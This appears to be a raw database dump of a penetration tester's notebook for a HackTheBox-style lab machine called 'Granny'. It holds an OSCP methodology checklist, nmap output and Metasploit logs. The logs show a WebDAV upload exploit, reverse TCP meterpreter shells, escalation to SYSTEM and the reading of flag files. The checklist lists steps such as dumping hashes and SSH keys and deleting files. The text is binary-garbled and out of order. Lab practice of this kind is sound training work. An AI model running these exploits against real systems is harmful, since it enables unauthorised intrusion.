SQLite format 3@ $-  Y/Cindexsqlite_autoindex_children_1children tableimageimageCREATE TABLE image ( node_id INTEGER, offset INTEGER, justification TEXT, anchor TEXT, png BLOB, filename TEXT, link TEXT, time INTEGER ) wtablegridgridCREATE TABLE grid ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, col_min INTEGER, col_max INTEGER )btablecodeboxcodeboxCREATE TABLE codebox ( node_id INTEGER, offset INTEGER, justification TEXT, txt TEXT, syntax TEXT, width INTEGER, height INTEGER, is_width_pix INTEGER, do_highl_bra INTEGER, do_show_linenum INTEGER )mtablenodenodeCREATE TABLE node ( node_id INTEGER UNIQUE, name TEXT, txt TEXT, syntax TEXT, tags TEXT, is_ro INTEGER, is_richtxt INTEGER, has_codebox INTEGER, has_table INTEGER, has_image INTEGER, level INTEGER, ts_creation INTEGER, ts_lastsave INTEGER )';indexsqlite_autoindex_node_1node  '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?Lk'  TCPcustom-colors$A?&A[>CXk#'  Enumerationcustom-colors*A?&s.=ui' 10.11.1.custom-colors$A[Y)v)'  Dirb\DirBustercustom-colors$A?&xA[V1 m'  Niktocustom-colors$A?&oA?&l%'  Web Servicescustom-colors"A?&Nk'  UDPcustom-colors$A?&ЍA[?L̊E5'  TCP nmap -sC -sV -oA ./Granny 10.10.10.15 Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-02 21:04 EDT Nmap scan report for 10.10.10.15 Host is up (0.088s latency). Not shown: 999 filtered"k#'  Enumerationcustom-colors*A?&s.=u n$Lk '  "CMScustom-colors$A[Y)A[Y}xn'  !WebDavcustom-colors$A[W;A[X2l'   Othercustom-colorsA[EϯA[Tci '  DBcustom-colorsA[EA[Selk '  SNMPcustom-colorsA[DԢA[G!Bj '  SMBcustom-colorsA[PA[DNn )'  Other Servicescustom-colorsXA[Ad Vkv)'  Script Resultscustom-colorsXAIZ|xAIq/'  Post Exploitationcustom-colors*AIZnnI%w'  ExploitationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability msf5 > use exploit/windows/iis/iis_webdav_upload_asp msf5 exploit(windows/iis/iis_webdav_upload_asp) > options Module options (exploit/windows/iis/iis_webdav_upload_asp): Name Current Setting Required Description ---- # ccX/]' )I'  Script Resultsmeterpreter > run post/multi/recon/local_exploit_suggester [*] 10.10.10.15 - Collecting local exploits for x86/windows... [*] 10.10.10.15 - 29 exploit checks are being tried... [+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated. [+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. custom-colorsXAIZ|xAסQ7L OO\O G'   NetworkIPConfig\IFConfig Network Processes ARP DNS Routecustom-colors$A[*܁p)'   Users & GroupsUsers Groupscustom-colors$A[k׀.9q'   Installed ApplicationsInstalled Applicationscustom-colors$AILg ^O&+m'   Priv EscalationService Exploited: Vulnerability Type: Exploit POC: Description: Discovery of Vulnerability Exploit Code Used msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > use exploit/windows/local/ms15_051_client_copy_image msf5 exploit(windows/local/ms15_051_client_copy_image) > options Module options (exploit/windows/local/ms15_051_client_copy_image): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes T)c'  Scheduled JobsScheduled Taskscustom-colors$ANl AA-(#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtsg'  Goodiescustom-colorsVA?& c /9'  Software VersionsSoftware Versions Potential Exploitscustom-colorsANlH{xq/'  Proof\Flags\Othercustom-colors$ANl黺i'  Passwordscustom-colors$A?'!f'   Hashescustom-colors$A?&&ich_text>Individual Host Scanning ☐ nmap --top-ports 20 --open -iL iplist.txt ☐ nmap -sS -A -sV -O -p- ipaddress ☐ nmap -sU ipaddress Service Scanning WebAppNiktodirb ☐ dirbuster ☐ wpscan ☐ dotdotpwn ☐ view source ☐ davtest\cadevar ☐ droopscan ☐ joomscan ☐ LFI\RFI Test Linux\Windows ☐ snmpwalk -c public -v1 ipaddress 1 ☐ smbclient -L //ipaddress ☐ showmount -e ipaddress port ☐ rpcinfo ☐ Enum4Linux Anything Elsenmap scripts (locate *nse* | grep servicename) ☐ hydra ☐ MSF Aux Modules ☐ Download the softward Exploitation ☐ Gather Version Numbes ☐ Searchsploit ☐ Default Creds ☐ Creds Previously Gathered ☐ Download the software Post Exploitation Linux ☐ linux-local-enum.sh ☐ linuxprivchecker.py ☐ linux-exploit-suggestor.sh ☐ unix-privesc-check.py Windows ☐ wpc.exe ☐ windows-exploit-suggestor.py ☐ windows_privesc_check.py ☐ windows-privesc-check2.exe Priv Escalationacesss internal services (portfwd) ☐ add account Windows ☐ List of exploits Linux ☐ sudo su ☐ KernelDB ☐ Searchsploit Final ☐ Screenshot of IPConfig\WhoamI ☐ Copy proof.txt ☐ Dump hashes ☐ Dump SSH Keys ☐ Delete filescustom-colorsANl<A[ڸ., u!5' 10.10.10.15 - Grannycustom-colorsAסh  ' Log Bookcustom-colors(AI^he session to run this module on. Exploit target: Id Name -- ---- 0 Windows x86 msf5 exploit(windows/local/ms15_051_client_copy_image) > set session 1 session => 1 msf5 exploit(windows/local/ms15_051_client_copy_image) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(windows/local/ms15_051_client_copy_image) > set lhost 10.10.14.28 lhost => 10.10.14.28 msf5 exploit(windows/local/ms15_051_client_copy_image) > run [*] Started reverse TCP handler on 10.10.14.28:4444 [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied. [*] Exploit completed, but no session was created. msf5 exploit(windows/local/ms15_051_client_copy_image) > sessions 1 [*] Starting interaction with 1... meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4 0 System 272 4 smss.exe 324 272 csrss.exe 348 272 winlogon.exe 396 348 services.exe 408 348 lsass.exe 580 396 svchost.exe 668 396 svchost.exe 724 396 svchost.exe 752 396 svchost.exe 788 396 svchost.exe 924 396 spoolsv.exe  988 396 msdtc.exe 1068 396 cisvc.exe 1112 396 svchost.exe 1168 396 inetinfo.exe 1204 396 svchost.exe 1316 396 VGAuthService.exe 1360 348 logon.scr 1404 396 vmtoolsd.exe 1460 396 svchost.exe 1600 396 svchost.exe 1712 396 alg.exe 1864 580 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe 1912 396 dllhost.exe 2284 580 wmiprvse.exe 3012 580 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe 3584 1460 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe 3704 3584 svchost.exe x86 0 C:\WINDOWS\Temp\radB5155.tmp\svchost.exe 3896 1068 cidaemon.exe 3940 1068 cidaemon.exe 3976 1068 cidaemon.exe meterpreter > migrate 1864 [*] Migrating from 3704 to 1864... [*] Migration completed successfully. meterpreter > background [*] Backgrounding session 1... msf5 exploit(windows/local/ms15_051_client_copy_image) > run [*] Started reverse TCP handler on 10.10.14.28:4444 [*] Launching notepad to host the exploit... [+] Process 3556 launched. [*] Reflectively injecting the exploit DLL into 3556... [*] Injecting exploit into 3556... [*] Exploit injected. Injecting payload into 3556... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (180291 bytes) to 10.10.10.15 [*] Meterpreter session 2 opened (10.10.14.28:4444 -> 10.10.10.15:1033) at 2020-04-02 21:23:27 -0400 meterpreter > shell [-] Unknown command: shell. meterpreter > getuif [-] Unknown command: getuif. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > shell Process 3828 created. Channel 1 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>cd \ cd \ C:\>meterpreter > shell Process 4048 created. Channel 2 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>cd \ cd \ C:\>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of C:\ 04/12/2017 05:27 PM <DIR> ADFS 04/12/2017 05:04 PM 0 AUTOEXEC.BAT 04/12/2017 05:04 PM 0 CONFIG.SYS 04/12/2017 10:19 PM <DIR> Documents and Settings 04/12/2017 05:17 PM <DIR> FPSE_search 04/12/2017 05:17 PM <DIR> Inetpub 12/24/2017 08:21 PM <DIR> Program Files 12/24/2017 08:30 PM <DIR> WINDOWS 04/12/2017 05:05 PM <DIR> wmpub 2 File(s) 0 bytes 7 Dir(s) 18,091,319,296 bytes free C:\>cd "documents and settings" cd "documents and settings" C:\Documents and Settings>dir dir Volume in drive C has no label. Volume Serial Number is 246C-D7FE Directory of C:\Documents and Settings 04/12/2017 10:19 PM <DIR> . 04/12/2017 10:19 PM <DIR> .. 04/12/2017 09:48 PM <DIR> Administrator 04/12/2017 05:03 PM <DIR> All Users 04/12/2017 10:19 PM <DIR> Lakis 0 File(s) 0 bytes 5 Dir(s) 18,091,315,200 bytes free C:\Documents and Settings>type Administrator\Desktop\root.txt type Administrator\Desktop\root.txt aa4beed1c0584445ab463a6747bd06e9 C:\Documents and Settings>type Lakis\Deskmeterpreter > type Lakis\Desktop\user.txt [-] Unknown command: type. meterpreter > shell Process 1200 created. Channel 3 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>cd cd C:\WINDOWS\system32 C:\WINDOWS\system32>cd \Users cd \Users The system cannot find the path specified. C:\WINDOWS\system32>cd \ cd \ C:\>cd "Documents and settings: cd "Documents and settings: The filename, directory name, or volume label syntax is incorrect. C:\>cd "Documents and settings" cd "Documents and settings" C:\Documents and Settings>type Lakis\Desktopmeterpreter > shell Process 2984 created. Channel 4 created. Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>type C:\"Documents and Settings"\Lakis\Desktop\user.txt type C:\"Documents and Settings"\Lakis\Desktop\user.txt 700c5dc163014e22b3e408f8703f67d1 C:\WINDOWS\system32>whoami whoami nt authority\system C:\WINDOWS\system32>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 10.10.10.15 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.10.10.2 C:\WINDOWS\system32>meterpreter > Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colorsAסm (#i' MethodologyNetwork Scanning ☐ nmap -sn 10.11.1.* ☐ nmap -sL 10.11.1.* ☐ nbtscan -r 10.11.1.0/24 ☐ smbtree Process Listcustom-colors$AIwq&#w'  File SystemWriteable Files\Directories Directory List custom-colors$A[3QZ-U'  Host InformationOperating System Architecture Domain Installed Updates custom-colors$A[4* ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 6.0 | http-methods: |_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT |_http-server-header: Microsoft-IIS/6.0 |_http-title: Under Construction | http-webdav-scan: | Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH | Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK | Server Date: Fri, 03 Apr 2020 01:04:54 GMT | Server Type: Microsoft-IIS/6.0 |_ WebDAV type: Unknown Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.19 secondscustom-colors$A?&Aס5?$ --------------- -------- ----------- HttpPassword no The HTTP password to specify for authentication HttpUsername no The HTTP username to specify for authentication METHOD move yes Move or copy the file on the remote system from .txt -> .asp (Accepted: move, copy) PATH /metasploit%RAND%.asp yes The path to attempt to upload Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Automatic msf5 exploit(windows/iis/iis_webdav_upload_asp) > set rhosts 10.10.10.15 rhosts => 10.10.10.15 msf5 exploit(windows/iis/iis_webdav_upload_asp) > run [*] Started reverse TCP handler on 10.10.14.28:4444 [*] Checking /metasploit11327895.asp [*] Uploading 610747 bytes to /metasploit11327895.txt... [*] Moving /metasploit11327895.txt to /metasploit11327895.asp... [*] Executing /metasploit11327895.asp... [*] Deleting /metasploit11327895.asp (this doesn't always work)... [*] Sending stage (180291 bytes) to 10.10.10.15 [!] Deletion failed on /metasploit11327895.asp [403 Forbidden] [*] Meterpreter session 1 opened (10.10.14.28:4444 -> 10.10.10.15:1032) at 2020-04-02 21:16:02 -0400 Exploit Code Used Proof\Local.txt File ☐ Screenshot with ifconfig\ipconfig ☐ Submit too OSCP Exam Panel custom-colors,Aס/